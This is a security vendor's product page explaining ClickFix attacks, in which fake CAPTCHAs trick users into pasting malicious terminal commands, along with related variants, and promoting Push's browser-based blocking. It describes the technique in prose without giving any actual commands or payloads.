ClickFix makes malware installation feel like routine troubleshooting

ClickFix tricks users into installing malware themselves. A fake CAPTCHA copies a malicious command to the clipboard; the user pastes it into their terminal to resolve what looks like a routine browser issue. Then, the attack is over before anything appears suspicious.

Button

How ClickFix attacks work.

ClickFix lures are built to feel familiar. Fake CAPTCHAs and browser errors are styled to mimic the verification challenges users encounter every day. The mechanic is straightforward but highly effective.

1. The user lands on a compromised or malicious page and is prompted to complete a verification step.
2. Clicking the prompt copies a malicious command to the clipboard.
3. The user is instructed to open their terminal and paste the command to fix the issue.
4. The command executes using legitimate, pre-installed system utilities to pull down infostealer malware or a remote access tool.
5. Malware installs on the endpoint, and the user believes the verification completed successfully.

The *Fix family keeps expanding. InstallFix, discovered by Push, clones developer tool installation pages and replaces legitimate commands with malicious ones delivered via Google Ads. ConsentFix, another Push discovery, goes fully browser-native; the victim pastes OAuth key material from a legitimate Microsoft page into a phishing site, handing over account access without touching the terminal. 4 in 5 ClickFix payloads intercepted by Push arrived via search engines.

Why most security tools miss ClickFix

Endpoint tools are built around the assumption that malware arrives as a file. ClickFix turns this assumption on its head. The payload is executed by the user through a legitimate system utility, so there is no download to intercept or suspicious process to flag. Web sandboxes and email filters face the same problem when the delivery channel is a malicious ad or a compromised website rather than an attachment.

Browser-native variants like ConsentFix remove even the endpoint execution step, leaving traditional tools with nothing to act on. The attack completes inside the browser session, where most security tools have no visibility.

Block ClickFix attacks in the browser with Push

Push intercepts ClickFix and its variants at the source, before the user interacts with the lure, regardless of delivery channel. It identifies and blocks malicious pages as they load in the browser, whether the lure arrives through a search ad, a compromised site, or a messaging platform.

For browser-native variants like ConsentFix, where there is no endpoint activity to detect, browser visibility is the only reliable detection point. Push operates there by default.

Latest resources

Loading resources…